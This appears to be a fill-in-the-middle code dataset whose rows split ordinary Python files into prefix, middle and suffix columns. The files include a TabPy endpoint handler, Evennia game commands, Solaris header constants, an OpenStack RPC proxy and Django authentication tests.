prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
"""
HTTP handeler to serve specific endpoint request like
http://myserver:9004/endpoints/mymodel
For how generic endpoints requests is served look
at endpoints_handler.py
"""
import json
import logging
import shutil
from tabpy.tabpy_server.common.util import format_exception
from tabpy.tabpy_server.handlers import ManagementHandler
from tabpy.tabpy_server.handlers.base_handler import STAGING_THREAD
from tabpy.tabpy_server.management.state import get_query_object_path
from tabpy.tabpy_server.psws.callbacks import on_state_change
from tabpy.tabpy_server.handlers.util import AuthErrorStates
from tornado import gen
class EndpointHandler(ManagementHandler):
def initialize(self, app):
super(EndpointHandler, self).initialize(app)
def get(self, endpoint_name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing GET for /endpoints/{endpoint_name}")
self._add_CORS_header()
if not endpoint_name:
self.write(json.dumps(self.tabpy_state.get_endpoints()))
else:
if endpoint_name in self.tabpy_state.get_endpoints():
self.write(json.dumps(self.tabpy_state.get_endpoints()[endpoint_name]))
else:
self.error_out(
404,
"Unknown endpoint",
info=f"Endpoint {endpoint_name} is not found",
)
@gen.coroutine
def put(self, name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing PUT for /endpoints/{name}")
try:
if not self.request.body:
self.error_out(400, "Input body cannot be empty")
self.finish()
return
try:
request_data = json.loads(self.request.body.decode("utf-8"))
except BaseException as ex:
self.error_out(
400, log_message="Failed to decode input body", info=str(ex)
)
self.finish()
return
# check if endpoint exists
endpoints = self.tabpy_state.get_endpoints(name)
if len(endpoints) == 0:
self.error_out(404, f"endpoint {name} does not exist.")
self.finish()
return
new_version = int(endpoints[name]["version"]) + 1
self.logger.log(logging.INFO, f"Endpoint info: {request_data}")
err_msg = yield self._add_or_update_endpoint(
"update", name, new_version, request_data
)
if err_msg:
self.error_out(400, err_msg)
self.finish()
else:
self.write(self.tabpy_state.get_endpoints(name))
self.finish()
except Exception as e:
err_msg = format_exception(e, "update_endpoint")
self.error_out(500, err_msg)
self.finish()
@gen.coroutine
def delete(self, nam | e):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing DELETE for /endpoints/{name}")
try:
endpoints = self.tabpy_state.get_endpoints(name)
if len(endpoints) == 0:
| self.error_out(404, f"endpoint {name} does not exist.")
self.finish()
return
# update state
try:
endpoint_info = self.tabpy_state.delete_endpoint(name)
except Exception as e:
self.error_out(400, f"Error when removing endpoint: {e.message}")
self.finish()
return
# delete files
if endpoint_info["type"] != "alias":
delete_path = get_query_object_path(
self.settings["state_file_path"], name, None
)
try:
yield self._delete_po_future(delete_path)
except Exception as e:
self.error_out(400, f"Error while deleting: {e}")
self.finish()
return
self.set_status(204)
self.finish()
except Exception as e:
err_msg = format_exception(e, "delete endpoint")
self.error_out(500, err_msg)
self.finish()
on_state_change(
self.settings, self.tabpy_state, self.python_service, self.logger
)
@gen.coroutine
def _delete_po_future(self, delete_path):
future = STAGING_THREAD.submit(shutil.rmtree, delete_path)
ret = yield future
raise gen.Return(ret)
|
the red_button. Here we have defined
the commands and the cmdset in the same modul | e, but if you
have many different commands to merge it is often better
to define the cmdset separately, picking and choosing from
among the avai | lable commands as to what should be included in the
cmdset - this way you can often re-use the commands too.
"""
import random
from evennia import Command, CmdSet
# Some simple commands for the red button
# ------------------------------------------------------------
# Commands defined on the red button
# ------------------------------------------------------------
class CmdNudge(Command):
"""
Try to nudge the button's lid
Usage:
nudge lid
This command will have you try to
push the lid of the button away.
"""
key = "nudge lid" # two-word command name!
aliases = ["nudge"]
locks = "cmd:all()"
def func(self):
"""
nudge the lid. Random chance of success to open it.
"""
rand = random.random()
if rand < 0.5:
self.caller.msg("You nudge at the lid. It seems stuck.")
elif rand < 0.7:
self.caller.msg("You move the lid back and forth. It won't budge.")
else:
self.caller.msg("You manage to get a nail under the lid.")
self.caller.execute_cmd("open lid")
class CmdPush(Command):
"""
Push the red button
Usage:
push button
"""
key = "push button"
aliases = ["push", "press button", "press"]
locks = "cmd:all()"
def func(self):
"""
Note that we choose to implement this with checking for
if the lid is open/closed. This is because this command
is likely to be tried regardless of the state of the lid.
An alternative would be to make two versions of this command
and tuck them into the cmdset linked to the Open and Closed
lid-state respectively.
"""
if self.obj.db.lid_open:
string = "You reach out to press the big red button ..."
string += "\n\nA BOOM! A bright light blinds you!"
string += "\nThe world goes dark ..."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s presses the button. BOOM! %s is blinded by a flash!"
% (self.caller.name, self.caller.name),
exclude=self.caller,
)
# the button's method will handle all setup of scripts etc.
self.obj.press_button(self.caller)
else:
string = "You cannot push the button - there is a glass lid covering it."
self.caller.msg(string)
class CmdSmashGlass(Command):
"""
smash glass
Usage:
smash glass
Try to smash the glass of the button.
"""
key = "smash glass"
aliases = ["smash lid", "break lid", "smash"]
locks = "cmd:all()"
def func(self):
"""
The lid won't open, but there is a small chance
of causing the lamp to break.
"""
rand = random.random()
if rand < 0.2:
string = "You smash your hand against the glass"
string += " with all your might. The lid won't budge"
string += " but you cause quite the tremor through the button's mount."
string += "\nIt looks like the button's lamp stopped working for the time being."
self.obj.lamp_works = False
elif rand < 0.6:
string = "You hit the lid hard. It doesn't move an inch."
else:
string = "You place a well-aimed fist against the glass of the lid."
string += " Unfortunately all you get is a pain in your hand. Maybe"
string += " you should just try to open the lid instead?"
self.caller.msg(string)
self.caller.location.msg_contents(
"%s tries to smash the glass of the button." % (self.caller.name), exclude=self.caller
)
class CmdOpenLid(Command):
"""
open lid
Usage:
open lid
"""
key = "open lid"
aliases = ["open button", "open"]
locks = "cmd:all()"
def func(self):
"simply call the right function."
if self.obj.db.lid_locked:
self.caller.msg("This lid seems locked in place for the moment.")
return
string = "\nA ticking sound is heard, like a winding mechanism. Seems "
string += "the lid will soon close again."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s opens the lid of the button." % (self.caller.name), exclude=self.caller
)
# add the relevant cmdsets to button
self.obj.cmdset.add(LidClosedCmdSet)
# call object method
self.obj.open_lid()
class CmdCloseLid(Command):
"""
close the lid
Usage:
close lid
Closes the lid of the red button.
"""
key = "close lid"
aliases = ["close"]
locks = "cmd:all()"
def func(self):
"Close the lid"
self.obj.close_lid()
# this will clean out scripts dependent on lid being open.
self.caller.msg("You close the button's lid. It clicks back into place.")
self.caller.location.msg_contents(
"%s closes the button's lid." % (self.caller.name), exclude=self.caller
)
class CmdBlindLook(Command):
"""
Looking around in darkness
Usage:
look <obj>
... not that there's much to see in the dark.
"""
key = "look"
aliases = ["l", "get", "examine", "ex", "feel", "listen"]
locks = "cmd:all()"
def func(self):
"This replaces all the senses when blinded."
# we decide what to reply based on which command was
# actually tried
if self.cmdstring == "get":
string = "You fumble around blindly without finding anything."
elif self.cmdstring == "examine":
string = "You try to examine your surroundings, but can't see a thing."
elif self.cmdstring == "listen":
string = "You are deafened by the boom."
elif self.cmdstring == "feel":
string = "You fumble around, hands outstretched. You bump your knee."
else:
# trying to look
string = "You are temporarily blinded by the flash. "
string += "Until it wears off, all you can do is feel around blindly."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s stumbles around, blinded." % (self.caller.name), exclude=self.caller
)
class CmdBlindHelp(Command):
"""
Help function while in the blinded state
Usage:
help
"""
key = "help"
aliases = "h"
locks = "cmd:all()"
def func(self):
"Give a message."
self.caller.msg("You are beyond help ... until you can see again.")
# ---------------------------------------------------------------
# Command sets for the red button
# ---------------------------------------------------------------
# We next tuck these commands into their respective command sets.
# (note that we are overdoing the cdmset separation a bit here
# to show how it works).
class DefaultCmdSet(CmdSet):
"""
The default cmdset always sits
on the button object and whereas other
command sets may be added/merge onto it
and hide it, removing them will always
bring it back. It's added to the object
using obj.cmdset.add_default().
"""
key = "RedButtonDefault"
mergetype = "Union" # this is default, we don't really need to put it here.
def at_cmdset_creation(self):
"Init the cmdset"
self.add(CmdPush())
class LidClosedCmdSet(CmdSet):
"""
A simple cmdset tied to the redbutton object.
It contains the commands that launches the other
command sets, making the red button a self-contained
item (i.e. you don't have to manually add any
scripts etc to it when creating it).
"""
key = "LidClosedCmdSet"
# default Union is used *except* if we are adding to a
# cmdset named LidOpenCmdSet - this one we replace
# completely.
|
01000
PSR_EC = 0x00002000
PSR_RSV = 0x000FC000
PSR_ICC = 0x00F00000
PSR_C = 0x00100000
PSR_V = 0x00200000
PSR_Z = 0x00400000
PSR_N = 0x00800000
PSR_VER = 0x0F000000
PSR_IMPL = 0xF0000000
PSL_ALLCC = PSR_ICC
PSL_USER = (PSR_S)
PSL_USERMASK = (PSR_ICC)
PSL_UBITS = (PSR_ICC|PSR_EF)
def USERMODE(ps): return (((ps) & PSR_PS) == 0)
# Included from sys/fsr.h
FSR_CEXC = 0x0000001f
FSR_AEXC = 0x000003e0
FSR_FCC = 0x00000c00
FSR_PR = 0x00001000
FSR_QNE = 0x00002000
FSR_FTT = 0x0001c000
FSR_VER = 0x000e0000
FSR_TEM = 0x0f800000
FSR_RP = 0x30000000
FSR_RD = 0xc0000000
FSR_VER_SHIFT = 17
FSR_FCC1 = 0x00000003
FSR_FCC2 = 0x0000000C
FSR_FCC3 = 0x00000030
FSR_CEXC_NX = 0x00000001
FSR_CEXC_DZ = 0x00000002
FSR_CEXC_UF = 0x00000004
FSR_CEXC_OF = 0x00000008
FSR_CEXC_NV = 0x00000010
FSR_AEXC_NX = (0x1 << 5)
FSR_AEXC_DZ = (0x2 << 5)
FSR_AEXC_UF = (0x4 << 5)
FSR_AEXC_OF = (0x8 << 5)
FSR_AEXC_NV = (0x10 << 5)
FTT_NONE = 0
FTT_IEEE = 1
FTT_UNFIN = 2
FTT_UNIMP = 3
FTT_SEQ = 4
FTT_ALIGN = 5
FTT_DFAULT = 6
FSR_FTT_SHIFT = 14
FSR_FTT_IEEE = (FTT_IEEE << FSR_FTT_SHIFT)
FSR_FTT_UNFIN = (FTT_UNFIN << FSR_FTT_SHIFT)
FSR_FTT_UNIMP = (FTT_UNIMP << FSR_FTT_SHIFT)
FSR_FTT_SEQ = (FTT_SEQ << FSR_FTT_SHIFT)
FSR_FTT_ALIGN = (FTT_ALIGN << FSR_FTT_SHIFT)
FSR_FTT_DFAULT = (FTT_DFAULT << FSR_FTT_SHIFT)
FSR_TEM_NX = (0x1 << 23)
FSR_TEM_DZ = (0x2 << 23)
FSR_TEM_UF = (0x4 << 23)
FSR_TEM_OF = (0x8 << 23)
FSR_TEM_NV = (0x10 << 23)
RP_DBLEXT = 0
RP_SINGLE = 1
RP_DOUBLE = 2
RP_RESERVED = 3
RD_NEAR = 0
RD_ZER0 = 1
RD_POSINF = 2
RD_NEGINF = 3
FPRS_DL = 0x1
FPRS_DU = 0x2
FPRS_FEF = 0x4
PIL_MAX = 0xf
def SAVE_GLOBALS(RP): return \
def RESTORE_GLOBALS(RP): return \
def SAVE_OUTS(RP): return \
def RESTORE_OUTS(RP): return \
def SAVE_WINDOW(SBP): return \
def RESTORE_WINDOW(SBP): return \
def STORE_FPREGS(FP): return \
def LOAD_FPREGS(FP): return \
_SPARC_MAXREGWINDOW = 31
_XRS_ID = 0x78727300
GETCONTEXT = 0
SETCONTEXT = 1
UC_SIGMASK = 001
UC_STACK = 002
UC_CPU = 004
UC_MAU = 010
UC_FPU = UC_MAU
UC_INTR = 020
UC_ASR = 040
UC_MCONTEXT = (UC_CPU|UC_FPU|UC_ASR)
UC_ALL = (UC_SIGMASK|UC_STACK|UC_MCONTEXT)
_SIGQUEUE_MAX = 32
_SIGNOTIFY_MAX = 32
# Included from sys/pcb.h
INSTR_VALID = 0x02
NORMAL_STEP = 0x04
WATCH_STEP = 0x08
CPC_OVERFLOW = 0x10
ASYNC_HWERR = 0x20
STEP_NONE = 0
STEP_REQUESTED = 1
STEP_ACTIVE = 2
STEP_WASACTIVE = 3
# Included from sys/msacct.h
LMS_USER = 0
LMS_SYSTEM = 1
LMS_TRAP = 2
LMS_TFAULT = 3
LMS_DFAULT = 4
LMS_KFAULT = 5
LMS_USER_LOCK = 6
LMS_SLEEP = 7
LMS_WAIT_CPU = 8
LMS_STOPPED = 9
NMSTATES = 10
# Included from sys/lwp.h
# Included from sys/synch.h
from TYPES import *
USYNC_THREAD = 0x00
USYNC_PROCESS = 0x01
LOCK_NORMAL = 0x00
LOCK_ERRORCHECK = 0x02
LOCK_RECURSIVE = 0x04
USYNC_PROCESS_ROBUST = 0x08
LOCK_PRIO_NONE = 0x00
LOCK_PRIO_INHERIT = 0x10
LOCK_PRIO_PROTECT = 0x20
LOCK_STALL_NP = 0x00
LOCK_ROBUST_NP = 0x40
LOCK_OWNERDEAD = 0x1
LOCK_NOTRECOVERABLE = 0x2
LOCK_INITED = 0x4
LOCK_UNMAPPED = 0x8
LWP_DETACHED = 0x00000040
LWP_SUSPENDED = 0x00000080
__LWP_ASLWP = 0x00000100
MAXSYSARGS = 8
NORMALRETURN = 0
JUSTRETURN = 1
LWP_USER = 0x01
LWP_SYS = 0x02
TS_FREE = 0x00
TS_SLEEP = 0x01
TS_RUN = 0x02
TS_ONPROC = 0x04
TS_ZOMB = 0x08
TS_STOPPED = 0x10
T_INTR_THREAD = 0x0001
T_WAKEABLE = 0x0002
T_TOMASK = 0x0004
T_TALLOCSTK = 0x0008
T_WOULDBLOCK = 0x0020
T_DONTBLOCK = 0x0040
T_DONTPEND = 0x0080
T_SYS_PROF = 0x0100
T_WAITCVSEM = 0x0200
T_WATCHPT = 0x0400
T_PANIC = 0x0800
TP_HOLDLWP = 0x0002
TP_TWAIT = 0x0004
TP_LWPEXIT = 0x0008
TP_PRSTOP = 0x0010
TP_CHKPT = 0x0020
TP_EXITLWP = 0x0040
TP_PRVSTOP = 0x0080
TP_MSACCT = 0x0100
TP | _STOPPING = 0x0200
TP_WATCHPT = 0x0400
TP_PAUSE = 0x0800
TP_CHANGEBIND = 0x1000
TS_LOAD = 0x0001
TS_DONT_SWAP = 0x0002
TS_SWAPENQ = 0x0004
TS_ON_SWAPQ = 0x0008
TS_CSTART = 0x0100
TS_UNPAUSE = 0x0200
TS_XSTART = 0x0400
TS_PSTART = 0x0800
TS_RESUME = 0x1000
TS_CREATE = 0x2000
TS_ALLSTART = \
(TS_CSTART|TS_UNPAUSE|TS_XSTART|TS_PSTART|TS_RESUME|TS_CREATE)
def CPR_VSTOPPED(t): return \ |
def THREAD_TRANSITION(tp): return thread_transition(tp);
def THREAD_STOP(tp): return \
def THREAD_ZOMB(tp): return THREAD_SET_STATE(tp, TS_ZOMB, NULL)
def SEMA_HELD(x): return (sema_held((x)))
NO_LOCKS_HELD = 1
NO_COMPETING_THREADS = 1
# Included from sys/cred.h
# Included from sys/uio.h
from TYPES import *
# Included from sys/resource.h
from TYPES import *
PRIO_PROCESS = 0
PRIO_PGRP = 1
PRIO_USER = 2
RLIMIT_CPU = 0
RLIMIT_FSIZE = 1
RLIMIT_DATA = 2
RLIMIT_STACK = 3
RLIMIT_CORE = 4
RLIMIT_NOFILE = 5
RLIMIT_VMEM = 6
RLIMIT_AS = RLIMIT_VMEM
RLIM_NLIMITS = 7
RLIM_INFINITY = (-3l)
RLIM_SAVED_MAX = (-2l)
RLIM_SAVED_CUR = (-1l)
RLIM_INFINITY = 0x7fffffff
RLIM_SAVED_MAX = 0x7ffffffe
RLIM_SAVED_CUR = 0x7ffffffd
RLIM32_INFINITY = 0x7fffffff
RLIM32_SAVED_MAX = 0x7ffffffe
RLIM32_SAVED_CUR = 0x7ffffffd
# Included from sys/model.h
# Included from sys/debug.h
def ASSERT64(x): return ASSERT(x)
def ASSERT32(x): return ASSERT(x)
DATAMODEL_MASK = 0x0FF00000
DATAMODEL_ILP32 = 0x00100000
DATAMODEL_LP64 = 0x00200000
DATAMODEL_NONE = 0
DATAMODEL_NATIVE = DATAMODEL_LP64
DATAMODEL_NATIVE = DATAMODEL_ILP32
def STRUCT_SIZE(handle): return \
def STRUCT_BUF(handle): return ((handle).ptr.m64)
def SIZEOF_PTR(umodel): return \
def STRUCT_SIZE(handle): return (sizeof (*(handle).ptr))
def STRUCT_BUF(handle): return ((handle).ptr)
def SIZEOF_PTR(umodel): return sizeof (caddr_t)
def lwp_getdatamodel(t): return DATAMODEL_ILP32
RUSAGE_SELF = 0
RUSAGE_CHILDREN = -1
# Included from vm/seg_enum.h
# Included from sys/buf.h
# Included from sys/kstat.h
from TYPES import *
KSTAT_STRLEN = 31
def KSTAT_ENTER(k): return \
def KSTAT_EXIT(k): return \
KSTAT_TYPE_RAW = 0
KSTAT_TYPE_NAMED = 1
KSTAT_TYPE_INTR = 2
KSTAT_TYPE_IO = 3
KSTAT_TYPE_TIMER = 4
KSTAT_NUM_TYPES = 5
KSTAT_FLAG_VIRTUAL = 0x01
KSTAT_FLAG_VAR_SIZE = 0x02
KSTAT_FLAG_WRITABLE = 0x04
KSTAT_FLAG_PERSISTENT = 0x08
KSTAT_FLAG_DORMANT = 0x10
KSTAT_FLAG_INVALID = 0x20
KSTAT_READ = 0
KSTAT_WRITE = 1
KSTAT_DATA_CHAR = 0
KSTAT_DATA_INT32 = 1
KSTAT_DATA_UINT32 = 2
KSTAT_DATA_INT64 = 3
KSTAT_DATA_UINT64 = 4
KSTAT_DATA_LONG = KSTAT_DATA_INT32
KSTAT_DATA_ULONG = KSTAT_DATA_UINT32
KSTAT_DATA_LONG = KSTAT_DATA_INT64
KSTAT_DATA_ULONG = KSTAT_DATA_UINT64
KSTAT_DATA_LONG = 7
KSTAT_DATA_ULONG = 8
KSTAT_DATA_LONGLONG = KSTAT_DATA_INT64
KSTAT_DATA_ULONGLONG = KSTAT_DATA_UINT64
KSTAT_DATA_FLOAT = 5
KSTAT_DATA_DOUBLE = 6
KSTAT_INTR_HARD = 0
KSTAT_INTR_SOFT = 1
KSTAT_INTR_WATCHDOG = 2
KSTAT_INTR_SPURIOUS = 3
KSTAT_INTR_MULTSVC = 4
KSTAT_NUM_INTRS = 5
B_BUSY = 0x0001
B_DONE = 0x0002
B_ERROR = 0x0004
B_PAGEIO = 0x0010
B_PHYS = 0x0020
B_READ = 0x0040
B_WRITE = 0x0100
B_KERNBUF = 0x0008
B_WANTED = 0x0080
B_AGE = 0x000200
B_ASYNC = 0x000400
B_DELWRI = 0x000800
B_STALE = 0x001000
B_DONTNEED = 0x002000
B_REMAPPED = 0x004000
B_FREE = 0x008000
B_INVAL = 0x010000
B_FORCE = 0x020000
B_HEAD = 0x040000
B_NOCACHE = 0x080000
B_TRUNC = 0x100000
B_SHADOW = 0x200000
B_RETRYWRI = 0x400000
def notavail(bp): return \
def BWRITE(bp): return \
def BWRITE2(bp): return \
VROOT = 0x01
VNOCACHE = 0x02
VNOMAP = 0x04
VDUP = 0x08
VNOSWAP = 0x10
VNOMOUNT = 0x20
VISSWAP = 0x40
VSWAPLIKE = 0x80
VVFSLOCK = 0x100
VVFSWAIT = 0x200
VVMLOCK = 0x400
VDIROPEN = 0x800
VVMEXEC = 0x1000
VPXFS = 0x2000
AT_TYPE = 0x0001
AT_MODE = 0x0002
AT_UID = 0x0004
AT_GID = 0x0008
AT_FSID = 0x0010
AT_NODEID = 0x0020
AT_NLINK = 0x0040
AT_SIZE = 0x0080
AT_ATIME = 0x0100
AT_MTIME = 0x0200
AT_CTIME = 0x0400
AT_RDEV = 0x0800
AT_BLKSIZE = 0x1000
AT_NBLOCKS = 0x2000
AT_VCODE = 0x4000
AT_ALL = (AT_TYPE|AT_MODE|AT_UID|AT_GID|AT_FSID|AT_NODEID|\
AT_NLINK|AT_SIZE|AT_ATIME|AT_MTIME|AT_CTIME|\
AT_RDEV|AT_BLKSIZE|AT_NBLOCKS|AT_VCODE)
AT_STAT = (AT_MODE|AT_UID|AT_GID|AT_FSID|AT_NODEID|AT_NLINK|\
AT_SIZE|AT_ATIME|AT_MTIME|AT_CTIME|AT_RDEV)
AT_TIMES = (AT_ATIME|AT_MTIME|AT_CTIME)
AT_NOSET = (AT_NLINK|AT_RDEV|AT_FSID|AT_NODEID|AT_TYPE|\
AT_BLKSIZE|AT_NBLOCKS|AT_VCODE)
VSUID = 04000
VSGID = 02000
VSVTX = 01000
VREAD = 00400
VWRITE = 00200
VEXEC = 00100
MODEMASK = 07777
PERMMASK = 00777
def MANDMODE(mode): return (((mode) & (VSGID|(VEXEC>>3))) == VSGID)
VSA_ACL = 0x0001
VSA_ACLCNT = 0x0002
VSA_DFACL = 0x0004
VSA_DF |
# from test_plus.test import TestCase
# |
#
# class TestUser(TestCase):
#
# def setUp(self):
# self.user = self.make_user()
#
# | def test__str__(self):
# self.assertEqual(
# self.user.__str__(),
# 'testuser' # This is the default username for self.make_user()
# )
#
# def test_get_absolute_url(self):
# self.assertEqual(
# self.user.get_absolute_url(),
# '/users/testuser/'
# )
|
#/usr/bin/env python
import codecs
import os
import sys
from setuptools import setup, find_packages
if 'publish' in sys.argv:
os.syste | m('python setup.py sdist upload')
sys.exit()
read = lambda filepath: codecs.open(filepath, 'r', 'utf-8').read()
# Dynamically calculate the version based on galeria.VERSION.
version = __import__('galeria').get_version()
setup(
name='django-galeria',
version=version,
description='Pluggable gallery/portfolio application for Django pro | jects',
long_description=read(os.path.join(os.path.dirname(__file__), 'README.rst')),
author='Guilherme Gondim',
author_email='semente+django-galeria@taurinus.org',
maintainer='Guilherme Gondim',
maintainer_email='semente+django-galeria@taurinus.org',
license='BSD License',
url='https://bitbucket.org/semente/django-galeria/',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=['django-mptt']
)
|
side of an
rpc API.
"""
# The default namespace, which can be overridden in a subclass.
RPC_API_NAMESPACE = None
def __init__(self, topic, default_version, version_cap=None,
serializer=None):
"""Initialize an RpcProxy.
:param topic: The topic to use for all messages.
:param default_version: The default API version to request in all
outgoing messages. This can be overridden on a per-message
basis.
:param version_cap: Optionally cap the maximum version used for sent
messages.
:param serializer: Optionaly (de-)serialize entities with a
provided helper.
"""
self.topic = topic
self.default_version = default_version
self.version_cap = version_cap
if serializer i | s None:
serializer = rpc_serializer.NoOpSerializer()
self.serializer = serializer
super(RpcProxy, self).__init__()
def _set_version(self, msg, vers):
"""Helper m | ethod to set the version in a message.
:param msg: The message having a version added to it.
:param vers: The version number to add to the message.
"""
v = vers if vers else self.default_version
if (self.version_cap and not
rpc_common.version_is_compatible(self.version_cap, v)):
raise rpc_common.RpcVersionCapError(version_cap=self.version_cap)
msg['version'] = v
def _get_topic(self, topic):
"""Return the topic to use for a message."""
return topic if topic else self.topic
def can_send_version(self, version):
"""Check to see if a version is compatible with the version cap."""
return (not self.version_cap or
rpc_common.version_is_compatible(self.version_cap, version))
@staticmethod
def make_namespaced_msg(method, namespace, **kwargs):
return {'method': method, 'namespace': namespace, 'args': kwargs}
def make_msg(self, method, **kwargs):
return self.make_namespaced_msg(method, self.RPC_API_NAMESPACE,
**kwargs)
def _serialize_msg_args(self, context, kwargs):
"""Helper method called to serialize message arguments.
This calls our serializer on each argument, returning a new
set of args that have been serialized.
:param context: The request context
:param kwargs: The arguments to serialize
:returns: A new set of serialized arguments
"""
new_kwargs = dict()
for argname, arg in kwargs.iteritems():
new_kwargs[argname] = self.serializer.serialize_entity(context,
arg)
return new_kwargs
def call(self, context, msg, topic=None, version=None, timeout=None):
"""rpc.call() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:param timeout: (Optional) A timeout to use when waiting for the
response. If no timeout is specified, a default timeout will be
used that is usually sufficient.
:returns: The return value from the remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
real_topic = self._get_topic(topic)
try:
result = rpc.call(context, real_topic, msg, timeout)
return self.serializer.deserialize_entity(context, result)
except rpc.common.Timeout as exc:
raise rpc.common.Timeout(
exc.info, real_topic, msg.get('method'))
def multicall(self, context, msg, topic=None, version=None, timeout=None):
"""rpc.multicall() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:param timeout: (Optional) A timeout to use when waiting for the
response. If no timeout is specified, a default timeout will be
used that is usually sufficient.
:returns: An iterator that lets you process each of the returned values
from the remote method as they arrive.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
real_topic = self._get_topic(topic)
try:
result = rpc.multicall(context, real_topic, msg, timeout)
return self.serializer.deserialize_entity(context, result)
except rpc.common.Timeout as exc:
raise rpc.common.Timeout(
exc.info, real_topic, msg.get('method'))
def cast(self, context, msg, topic=None, version=None):
"""rpc.cast() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.cast() does not wait on any return value from the
remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.cast(context, self._get_topic(topic), msg)
def fanout_cast(self, context, msg, topic=None, version=None):
"""rpc.fanout_cast() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.fanout_cast() does not wait on any return value
from the remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.fanout_cast(context, self._get_topic(topic), msg)
def cast_to_server(self, context, server_params, msg, topic=None,
version=None):
"""rpc.cast_to_server() a remote method.
:param context: The request context
:param server_params: Server parameters. See rpc.cast_to_server() for
details.
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.cast_to_server() does not wait on any
return values.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.cast_to_server(context, server_params, self._get_topic(topic), msg)
def fanout_cast_to_server(self, context, server_params, msg, topic=None,
version=None):
"""rpc.fanout_cast_to_server() a remote method.
:param context: The request context
:param server_params: Server parameters. See rpc.cast_to_server() for
details.
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.fanout_cast_to_server() does not wait on any
return values.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
rpc.fanout_cast_to_server(context, server_params,
|
def has_module_perms(self, user, app_label):
if not user.is_anonymous() and not user.is_active:
return False
return app_label == "app1"
def get_all_permissions(self, user, obj=None):
if not obj:
return [] # We only support row level perms
if not isinstance(obj, TestObj):
return ['none']
if user.is_anonymous():
return ['anon']
if user.username == 'test2':
return ['simple', 'advanced']
else:
return ['simple']
def get_group_permissions(self, user, obj=None):
if not obj:
return # We only support row level perms
if not isinstance(obj, TestObj):
return ['none']
if 'test_group' in [group.name for group in user.groups.all()]:
return ['group_perm']
else:
return ['none']
@modify_settings(AUTHENTICATION_BACKENDS={
'append': 'auth_tests.test_auth_backends.SimpleRowlevelBackend',
})
class RowlevelBackendTest(TestCase):
"""
Tests for auth backend that supports object level permissions
"""
def setUp(self):
self.user1 = User.objects.create_user('test', 'test@example.com', 'test')
self.user2 = User.objects.create_user('test2', 'test2@example.com', 'test')
self.user3 = User.objects.create_user('test3', 'test3@example.com', 'test')
def tearDown(self):
# The get_group_permissions test messes with ContentTypes, which will
# be cached; flush the cache to ensure there are no side effects
# Refs #14975, #14925
ContentType.objects.clear_cache()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user2.has_perm('perm', TestObj()), True)
self.assertEqual(self.user2.has_perm('perm'), False)
self.assertEqual(self.user2.has_perms(['simple', 'advanced'], TestObj()), True)
self.assertEqual(self.user3.has_perm('perm', TestObj()), False)
self.assertEqual(self.user3.has_perm('anon', TestObj()), False)
self.assertEqual(self.user3.has_perms(['simple', 'advanced'], TestObj()), False)
def test_get_all_permissions(self):
self.assertEqual(self.user1.get_all_permissions(TestObj()), {'simple'})
self.assertEqual(self.user2.get_all_permissions(TestObj()), {'simple', 'advanced'})
self.assertEqual(self.user2.get_all_permissions(), set())
def test_get_group_permissions(self):
group = Group.objects.create(name='test_group')
self.user3.groups.add(group)
self.assertEqual(self.user3.get_group_permissions(TestObj()), {'group_perm'})
@override_settings(
AUTHENTICATION_BACKENDS=['auth_tests.test_auth_backends.SimpleRowlevelBackend'],
)
class AnonymousUserBackendTest(SimpleTestCase):
"""
Tests for AnonymousUser delegating to backend.
"""
def setUp(self):
self.user1 = AnonymousUser()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user1.has_perm('anon', TestObj()), True)
def test_has_perms(self):
self.assertEqual(self.user1.has_perms(['anon'], TestObj()), True)
self.assertEqual(self.user1.has_perms(['anon', 'perm'], TestObj()), False)
def test_has_module_perms(self):
self.assertEqual(self.user1.has_module_perms("app1"), True)
self.assertEqual(self.user1.has_module_perms("app2"), False)
def test_get_all_permissions(self):
self.assertEqual(self.user1.get_all_permissions(TestObj()), {'anon'})
@override_settings(AUTHENTICATION_BACKENDS=[])
class NoBackendsTest(TestCase):
"""
Tests that an appropriate error is raised if no auth backends are provided.
"""
def setUp(self):
self.user = User.objects.create_user('test', 'test@example.com', 'test')
def test_raises_exception(self):
with self.assertRaises(ImproperlyConfigured):
self.user.has_perm(('perm', TestObj()))
